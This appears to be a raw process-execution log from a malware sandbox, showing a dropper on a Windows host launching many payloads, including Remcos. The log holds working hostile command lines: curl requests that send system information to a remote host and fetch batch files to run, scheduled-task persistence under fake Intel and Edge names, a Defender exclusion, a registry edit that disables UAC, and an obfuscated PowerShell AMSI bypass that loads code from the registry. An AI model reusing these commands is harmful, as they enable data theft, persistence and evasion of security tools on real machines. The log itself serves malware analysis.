C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\random.exe

"C:\Users\Admin\AppData\Local\Temp\a\random.exe"

C:\Users\Admin\AppData\Local\Temp\a\client.exe

"C:\Users\Admin\AppData\Local\Temp\a\client.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Users\Admin\AppData\Local\Temp\onefile_376_133785012176326944\l4.exe

C:\Users\Admin\AppData\Local\Temp\a\l4.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe

"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe

"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\servicing\TrustedInstaller.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe

"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"

C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe

"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe

"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"

C:\Windows\system32\mode.com

mode 65,10

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p24291711423417250691697322505 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "in.exe"

C:\Users\Admin\AppData\Local\Temp\main\in.exe

"in.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del in.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\FCTR16PHVKF3" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt

C:\Windows\SysWOW64\curl.exe

curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F5A54534C4C5246482F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"

C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe

"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe

"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"

C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe

"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp100.tmp.bat

C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe

"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"

C:\Users\Admin\AppData\Local\Temp\a\RMX.exe

"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"

C:\ProgramData\Remcos\remcos.exe

C:\ProgramData\Remcos\remcos.exe

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\0RQI589Z58YU" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe

"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"

C:\Windows\System32\certutil.exe

"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1D83.tmp"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe

"C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"

C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe

"C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"

C:\Windows\SYSTEM32\attrib.exe

attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\attrib.exe

attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.0.0.1; del gU8ND0g.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe

"C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"

C:\Program Files\Windows Media Player\graph\graph.exe

"C:\Program Files\Windows Media Player\graph\graph.exe"

C:\Users\Admin\AppData\Local\Temp\a\888.exe

"C:\Users\Admin\AppData\Local\Temp\a\888.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\explorer.exe

explorer.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Users\Admin\AppData\Local\Temp\a\50to.exe

"C:\Users\Admin\AppData\Local\Temp\a\50to.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CgQTGPodzTyw{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZyEeawiuPnMRLX,[Parameter(Position=1)][Type]$wSfwjGIeCy)$ManiboOSoeP=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'f'+[Char](108)+'ec'+[Char](116)+''+'e'+''+[Char](100)+'D'+[Char](101)+''+'l'+'e'+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+'e'+'l'+[Char](101)+''+'g'+''+[Char](97)+'te'+[Char](84)+''+[Char](121)+''+'p'+'e',''+'C'+''+'l'+''+[Char](97)+'ss'+','+''+'P'+''+[Char](117)+''+'b'+'lic'+','+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+[Char](100)+','+'A'+''+[Char](110)+''+'s'+''+'i'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$ManiboOSoeP.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZyEeawiuPnMRLX).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+''+[Char](105)+'m'+'e'+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$ManiboOSoeP.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$wSfwjGIeCy,$ZyEeawiuPnMRLX).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $ManiboOSoeP.CreateType();}$haNXAJHTYwclt=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'oso'+[Char](102)+''+[Char](116)+'.'+'W'+'in'+[Char](51)+''+[Char](50)+'.U'+[Char](110)+''+'s'+'a'+[Char](102)+''+'e'+''+'N'+''+'a'+''+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$NrGAxwwLFLqQyk=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+','+'St'+[Char](97)+'t'+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$kdSiEeEamrpeWmNNzBq=CgQTGPodzTyw @([String])([IntPtr]);$DPejLfzLLASsBslOMGwLeo=CgQTGPodzTyw @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$WYKDbrTpXIs=$haNXAJHTYwclt.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'ul'+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+'l'+''+'l'+'')));$jrOgFUmnXPKbva=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$ZwTtPthojZALcyERC=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$WYKDbrTpXIs,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'P'+[Char](114)+''+[Char](111)+''+'t'+'e'+'c'+''+[Char](116)+'')));$SDmQSZZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($jrOgFUmnXPKbva,$kdSiEeEamrpeWmNNzBq).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$QKqkiscBHXNBPBDjP=$NrGAxwwLFLqQyk.Invoke($Null,@([Object]$SDmQSZZ,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$wBiidsCSDH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,4,[ref]$wBiidsCSDH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QKqkiscBHXNBPBDjP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZwTtPthojZALcyERC,$DPejLfzLLASsBslOMGwLeo).Invoke($QKqkiscBHXNBPBDjP,[uint32]8,0x20,[ref]$wBiidsCSDH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+'E').GetValue('r'+[Char](117)+''+'t'+''+[Char](115)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{fe9f5556-1e34-42c8-89ab-afa746c397ba}

C:\Windows\system32\lsass.exe

